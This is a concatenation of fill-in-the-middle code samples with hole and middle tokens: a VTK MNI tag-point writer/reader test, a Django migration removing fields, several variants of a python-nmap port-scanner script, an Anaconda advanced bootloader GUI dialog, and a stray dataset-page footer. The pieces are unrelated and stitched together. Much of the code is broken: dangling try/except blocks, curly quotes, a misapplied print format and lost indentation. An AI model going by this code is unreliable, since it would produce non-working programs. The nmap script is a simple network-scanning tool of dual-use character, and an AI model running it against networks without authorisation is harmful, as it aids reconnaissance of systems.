fname = "mni-tagtest.tag"
channel = open(fname, "wb")
channel.close()
# create some random points in a sphere
#
sphere1 = vtk.vtkPointSource()
sphere1.SetNumberOfPoints(13)
xform = vtk.vtkTransform()
xform.RotateWXYZ(20, 1, 0, 0)
xformFilter = vtk.vtkTransformFilter()
xformFilter.SetTransform(xform)
xformFilter.SetInputConnection(sphere1.GetOutputPort())
labels = vtk.vtkStringArray()
labels.InsertNextValue("0")
labels.InsertNextValue("1")
labels.InsertNextValue("2")
labels.InsertNextValue("3")
labels.InsertNextValue("Halifax")
labels.InsertNextValue("Toronto")
labels.InsertNextValue("Vancouver")
labels.InsertNextValue("Larry")
labels.InsertNextValue("Bob")
labels.InsertNextValue("Jackie")
<|fim▁hole|>
weights = vtk.vtkDoubleArray()
weights.InsertNextValue(1.0)
weights.InsertNextValue(1.1)
weights.InsertNextValue(1.2)
weights.InsertNextValue(1.3)
weights.InsertNextValue(1.4)
weights.InsertNextValue(1.5)
weights.InsertNextValue(1.6)
weights.InsertNextValue(1.7)
weights.InsertNextValue(1.8)
weights.InsertNextValue(1.9)
weights.InsertNextValue(0.9)
weights.InsertNextValue(0.8)
weights.InsertNextValue(0.7)
writer = vtk.vtkMNITagPointWriter()
writer.SetFileName(fname)
writer.SetInputConnection(sphere1.GetOutputPort())
writer.SetInputConnection(1, xformFilter.GetOutputPort())
writer.SetLabelText(labels)
writer.SetWeights(weights)
writer.SetComments("Volume 1: sphere points\nVolume 2: transformed points")
writer.Write()
reader = vtk.vtkMNITagPointReader()
reader.CanReadFile(fname)
reader.SetFileName(fname)
textProp = vtk.vtkTextProperty()
textProp.SetFontSize(12)
textProp.SetColor(1.0, 1.0, 0.5)
labelHier = vtk.vtkPointSetToLabelHierarchy()
labelHier.SetInputConnection(reader.GetOutputPort())
labelHier.SetTextProperty(textProp)
labelHier.SetLabelArrayName("LabelText")
labelHier.SetMaximumDepth(15)
labelHier.SetTargetLabelCount(12)
labelMapper = vtk.vtkLabelPlacementMapper()
labelMapper.SetInputConnection(labelHier.GetOutputPort())
labelMapper.UseDepthBufferOff()
labelMapper.SetShapeToRect()
labelMapper.SetStyleToOutline()
labelActor = vtk.vtkActor2D()
labelActor.SetMapper(labelMapper)
glyphSource = vtk.vtkSphereSource()
glyphSource.SetRadius(0.01)
glyph = vtk.vtkGlyph3D()
glyph.SetSourceConnection(glyphSource.GetOutputPort())
glyph.SetInputConnection(reader.GetOutputPort())
mapper = vtk.vtkDataSetMapper()
mapper.SetInputConnection(glyph.GetOutputPort())
actor = vtk.vtkActor()
actor.SetMapper(mapper)
# Create rendering stuff
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.SetMultiSamples(0)
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
# Add the actors to the renderer, set the background and size
#
ren1.AddViewProp(actor)
ren1.AddViewProp(labelActor)
ren1.SetBackground(0, 0, 0)
renWin.SetSize(300, 300)
renWin.Render()
try:
os.remove(fname)
except OSError:
pass
# render the image
#
# iren.Start()
except IOError:
print "Unable to test the writer/reader."<|fim▁end|> | labels.InsertNextValue("10")
labels.InsertNextValue("11")
labels.InsertNextValue("12")
|
<|file_name|>0050_auto_20181005_1425.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-05 14:25
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("elections", "0049_move_status")]
operations = [
migrations.RemoveField(model_name="election", name="rejection_reason"),
migrations.RemoveField(model_name="election", name="suggested_status"),<|fim▁hole|> migrations.RemoveField(model_name="election", name="suggestion_reason"),
]<|fim▁end|> | |
<|file_name|>0050_auto_20181005_1425.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Generated by Django 1.11.16 on 2018-10-05 14:25
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
<|fim_middle|>
<|fim▁end|> | dependencies = [("elections", "0049_move_status")]
operations = [
migrations.RemoveField(model_name="election", name="rejection_reason"),
migrations.RemoveField(model_name="election", name="suggested_status"),
migrations.RemoveField(model_name="election", name="suggestion_reason"),
] |
<|file_name|>nmap_scannner.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the <|fim▁hole|>THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if “” in host:
print("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname())
else:
print("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())<|fim▁end|> | name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
|
<|file_name|>nmap_scannner.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
<|fim_middle|>
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if “” in host:
print("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname())
else:
print("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())
<|fim▁end|> | sys.exit("Please provide two arguments the first being the targets the second the ports") |
<|file_name|>nmap_scannner.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if “” in host:
prin <|fim_middle|>
else:
print("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())
<|fim▁end|> | t("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname())
|
<|file_name|>nmap_scannner.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
'''
Author: Christopher Duffy
Date: February 2015
Name: nmap_scanner.py
Purpose: To scan a network
Copyright (c) 2015, Christopher Duffy All rights reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met: * Redistributions
of source code must retain the above copyright notice, this list of conditions and
the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
try:
import nmap
except:
sys.exit("[!] Install the nmap library: pip install python-nmap")
# Argument Validator
if len(sys.argv) != 3:
sys.exit("Please provide two arguments the first being the targets the second the ports")
ports = str(sys.argv[2])
addrs = str(sys.argv[1])
scanner = nmap.PortScanner()
scanner.scan(addrs, ports)
for host in scanner.all_hosts():
if “” in host:
print("The host's IP address is %s and it's hostname was not found") % (host, scanner[host].hostname())
else:
prin <|fim_middle|>
<|fim▁end|> | t("The host's IP address is %s and it's hostname is %s") % (host, scanner[host].hostname())
|
<|file_name|>bootloader_advanced_gui.py<|end_file_name|><|fim▁begin|>#
# bootloader_advanced.py: gui advanced bootloader configuration dialog
#
# Jeremy Katz <[email protected]>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License<|fim▁hole|># Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import gtk
import gobject
import iutil
import partedUtils
import gui
from iw_gui import *
from rhpl.translate import _, N_
from bootlocwidget import BootloaderLocationWidget
class AdvancedBootloaderWindow(InstallWindow):
windowTitle = N_("Advanced Boot Loader Configuration")
def __init__(self, ics):
InstallWindow.__init__(self, ics)
self.parent = ics.getICW().window
def getPrev(self):
pass
def getNext(self):
# forcing lba32 can be a bad idea.. make sure they really want to
if (self.forceLBA.get_active() and not self.bl.forceLBA32):
rc = self.intf.messageWindow(_("Warning"),
_("Forcing the use of LBA32 for your bootloader when "
"not supported by the BIOS can cause your machine "
"to be unable to boot.\n\n"
"Would you like to continue and force LBA32 mode?"),
type = "custom",
custom_buttons = [_("Cancel"),
_("Force LBA32")])
if rc != 1:
raise gui.StayOnScreen
# set forcelba
self.bl.setForceLBA(self.forceLBA.get_active())
# set kernel args
self.bl.args.set(self.appendEntry.get_text())
# set the boot device
self.bl.setDevice(self.blloc.getBootDevice())
# set the drive order
self.bl.drivelist = self.blloc.getDriveOrder()
# set up the vbox with force lba32 and kernel append
def setupOptionsVbox(self):
self.options_vbox = gtk.VBox(False, 5)
self.options_vbox.set_border_width(5)
self.forceLBA = gtk.CheckButton(_("_Force LBA32 (not normally required)"))
self.options_vbox.pack_start(self.forceLBA, False)
self.forceLBA.set_active(self.bl.forceLBA32)
label = gui.WrappingLabel(_("If you wish to add default options to the "
"boot command, enter them into "
"the 'General kernel parameters' field."))
label.set_alignment(0.0, 0.0)
self.options_vbox.pack_start(label, False)
label = gui.MnemonicLabel(_("_General kernel parameters"))
self.appendEntry = gtk.Entry()
label.set_mnemonic_widget(self.appendEntry)
args = self.bl.args.get()
if args:
self.appendEntry.set_text(args)
box = gtk.HBox(False, 0)
box.pack_start(label)
box.pack_start(self.appendEntry)
al = gtk.Alignment(0.0, 0.0)
al.add(box)
self.options_vbox.pack_start(al, False)
def getScreen(self, anaconda):
self.dispatch = anaconda.dispatch
self.bl = anaconda.id.bootloader
self.intf = anaconda.intf
thebox = gtk.VBox (False, 10)
# boot loader location bits (mbr vs boot, drive order)
self.blloc = BootloaderLocationWidget(anaconda, self.parent)
thebox.pack_start(self.blloc.getWidget(), False)
thebox.pack_start (gtk.HSeparator(), False)
# some optional things
self.setupOptionsVbox()
thebox.pack_start(self.options_vbox, False)
return thebox<|fim▁end|> | # along with this program; if not, write to the Free Software |
<|file_name|>bootloader_advanced_gui.py<|end_file_name|><|fim▁begin|>#
# bootloader_advanced.py: gui advanced bootloader configuration dialog
#
# Jeremy Katz <[email protected]>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import gtk
import gobject
import iutil
import partedUtils
import gui
from iw_gui import *
from rhpl.translate import _, N_
from bootlocwidget import BootloaderLocationWidget
class AdvancedBootloaderWindow(InstallWindow):
<|fim_middle|>
<|fim▁end|> | windowTitle = N_("Advanced Boot Loader Configuration")
def __init__(self, ics):
InstallWindow.__init__(self, ics)
self.parent = ics.getICW().window
def getPrev(self):
pass
def getNext(self):
# forcing lba32 can be a bad idea.. make sure they really want to
if (self.forceLBA.get_active() and not self.bl.forceLBA32):
rc = self.intf.messageWindow(_("Warning"),
_("Forcing the use of LBA32 for your bootloader when "
"not supported by the BIOS can cause your machine "
"to be unable to boot.\n\n"
"Would you like to continue and force LBA32 mode?"),
type = "custom",
custom_buttons = [_("Cancel"),
_("Force LBA32")])
if rc != 1:
raise gui.StayOnScreen
# set forcelba
self.bl.setForceLBA(self.forceLBA.get_active())
# set kernel args
self.bl.args.set(self.appendEntry.get_text())
# set the boot device
self.bl.setDevice(self.blloc.getBootDevice())
# set the drive order
self.bl.drivelist = self.blloc.getDriveOrder()
# set up the vbox with force lba32 and kernel append
def setupOptionsVbox(self):
self.options_vbox = gtk.VBox(False, 5)
self.options_vbox.set_border_width(5)
self.forceLBA = gtk.CheckButton(_("_Force LBA32 (not normally required)"))
self.options_vbox.pack_start(self.forceLBA, False)
self.forceLBA.set_active(self.bl.forceLBA32)
label = gui.WrappingLabel(_("If you wish to add default options to the "
"boot command, enter them into "
"the 'General kernel parameters' field."))
label.set_alignment(0.0, 0.0)
self.options_vbox.pack_start(label, False)
label = gui.MnemonicLabel(_("_General kernel parameters"))
self.appendEntry = gtk.Entry()
label.set_mnemonic_widget(self.appendEntry)
args = self.bl.args.get()
if args:
self.appendEntry.set_text(args)
box = gtk.HBox(False, 0)
box.pack_start(label)
box.pack_start(self.appendEntry)
al = gtk.Alignment(0.0, 0.0)
al.add(box)
self.options_vbox.pack_start(al, False)
def getScreen(self, anaconda):
self.dispatch = anaconda.dispatch
self.bl = anaconda.id.bootloader
self.intf = anaconda.intf
thebox = gtk.VBox (False, 10)
# boot loader location bits (mbr vs boot, drive order)
self.blloc = BootloaderLocationWidget(anaconda, self.parent)
thebox.pack_start(self.blloc.getWidget(), False)
thebox.pack_start (gtk.HSeparator(), False)
# some optional things
self.setupOptionsVbox()
thebox.pack_start(self.options_vbox, False)
return thebox |
<|file_name|>bootloader_advanced_gui.py<|end_file_name|><|fim▁begin|>#
# bootloader_advanced.py: gui advanced bootloader configuration dialog
#
# Jeremy Katz <[email protected]>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import gtk
import gobject
import iutil
import partedUtils
import gui
from iw_gui import *
from rhpl.translate import _, N_
from bootlocwidget import BootloaderLocationWidget
class AdvancedBootloaderWindow(InstallWindow):
windowTitle = N_("Advanced Boot Loader Configuration")
def __init__(self, ics):
<|fim_middle|>
def getPrev(self):
pass
def getNext(self):
# forcing lba32 can be a bad idea.. make sure they really want to
if (self.forceLBA.get_active() and not self.bl.forceLBA32):
rc = self.intf.messageWindow(_("Warning"),
_("Forcing the use of LBA32 for your bootloader when "
"not supported by the BIOS can cause your machine "
"to be unable to boot.\n\n"
"Would you like to continue and force LBA32 mode?"),
type = "custom",
custom_buttons = [_("Cancel"),
_("Force LBA32")])
if rc != 1:
raise gui.StayOnScreen
# set forcelba
self.bl.setForceLBA(self.forceLBA.get_active())
# set kernel args
self.bl.args.set(self.appendEntry.get_text())
# set the boot device
self.bl.setDevice(self.blloc.getBootDevice())
# set the drive order
self.bl.drivelist = self.blloc.getDriveOrder()
# set up the vbox with force lba32 and kernel append
def setupOptionsVbox(self):
self.options_vbox = gtk.VBox(False, 5)
self.options_vbox.set_border_width(5)
self.forceLBA = gtk.CheckButton(_("_Force LBA32 (not normally required)"))
self.options_vbox.pack_start(self.forceLBA, False)
self.forceLBA.set_active(self.bl.forceLBA32)
label = gui.WrappingLabel(_("If you wish to add default options to the "
"boot command, enter them into "
"the 'General kernel parameters' field."))
label.set_alignment(0.0, 0.0)
self.options_vbox.pack_start(label, False)
label = gui.MnemonicLabel(_("_General kernel parameters"))
self.appendEntry = gtk.Entry()
label.set_mnemonic_widget(self.appendEntry)
args = self.bl.args.get()
if args:
self.appendEntry.set_text(args)
box = gtk.HBox(False, 0)
box.pack_start(label)
box.pack_start(self.appendEntry)
al = gtk.Alignment(0.0, 0.0)
al.add(box)
self.options_vbox.pack_start(al, False)
def getScreen(self, anaconda):
self.dispatch = anaconda.dispatch
self.bl = anaconda.id.bootloader
self.intf = anaconda.intf
thebox = gtk.VBox (False, 10)
# boot loader location bits (mbr vs boot, drive order)
self.blloc = BootloaderLocationWidget(anaconda, self.parent)
thebox.pack_start(self.blloc.getWidget(), False)
thebox.pack_start (gtk.HSeparator(), False)
# some optional things
self.setupOptionsVbox()
thebox.pack_start(self.options_vbox, False)
return thebox
<|fim▁end|> | InstallWindow.__init__(self, ics)
self.parent = ics.getICW().window |
<|file_name|>bootloader_advanced_gui.py<|end_file_name|><|fim▁begin|>#
# bootloader_advanced.py: gui advanced bootloader configuration dialog
#
# Jeremy Katz <[email protected]>
#
# Copyright 2001-2002 Red Hat, Inc.
#
# This software may be freely redistributed under the terms of the GNU
# library public license.
#
# You should have received a copy of the GNU Library Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#
import gtk
import gobject
import iutil
import partedUtils
import gui
from iw_gui import *
from rhpl.translate import _, N_
from bootlocwidget import BootloaderLocationWidget
class AdvancedBootloaderWindow(InstallWindow):
windowTitle = N_("Advanced Boot Loader Configuration")
def __init__(self, ics):
InstallWindow.__init__(self, ics)
self.parent = ics.getICW().window
def getPrev(self):
<|fim_middle|>
def getNext(self):
# forcing lba32 can be a bad idea.. make sure they really want to
if (self.forceLBA.get_active() and not self.bl.forceLBA32):
rc = self.intf.messageWindow(_("Warning"),
_("Forcing the use of LBA32 for your bootloader when "
"not supported by the BIOS can cause your machine "
"to be unable to boot.\n\n"
"Would you like to continue and force LBA32 mode?"),
type = "custom",
custom_buttons = [_("Cancel"),
_("Force LBA32")])
if rc != 1:
raise gui.StayOnScreen
# set forcelba
self.bl.setForceLBA(self.forceLBA.get_active())
# set kernel args
self.bl.args.set(self.appendEntry.get_text())
# set the boot device
self.bl.setDevice(self.blloc.getBootDevice())
# set the drive order
self.bl.drivelist = self.blloc.getDriveOrder()
# set up the vbox with force lba32 and kernel append
def setupOptionsVbox(self):
self.options_vbox = gtk.VBox(False, 5)
self.options_vbox.set_border_width(5)
self.forceLBA = gtk.CheckButton(_("_Force LBA32 (not normally required)"))
self.options_vbox.pack_start(self.forceLBA, False)
self.forceLBA.set_active(self.bl.forceLBA32)
label = gui.WrappingLabel(_("If you wish to add default options to the "
"boot command, enter them into "
"the 'General kernel parameters' field."))
label.set_alignment(0.0, 0.0)
self.options_vbox.pack_start(label, False)
label = gui.MnemonicLabel(_("_General kernel parameters"))
self.appendEntry = gtk.Entry()
label.set_mnemonic_widget(self.appendEntry)
args = self.bl.args.get()
if args:
self.appendEntry.set_text(args)
box = gtk.HBox(False, 0)
box.pack_start(label)
box.pack_start(self.appendEntry)
al = gtk.Alignment(0.0, 0.0)
al.add(box)
self.options_vbox.pack_start(al, False)
def getScreen(self, anaconda):
self.dispatch = anaconda.dispatch
self.bl = anaconda.id.bootloader
self.intf = anaconda.intf
thebox = gtk.VBox (False, 10)
# boot loader location bits (mbr vs boot, drive order)
self.blloc = BootloaderLocationWidget(anaconda, self.parent)
thebox.pack_start(self.blloc.getWidget(), False)
thebox.pack_start (gtk.HSeparator(), False)
# some optional things
self.setupOptionsVbox()
thebox.pack_start(self.options_vbox, False)
return thebox
<|fim▁end|> | pass |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.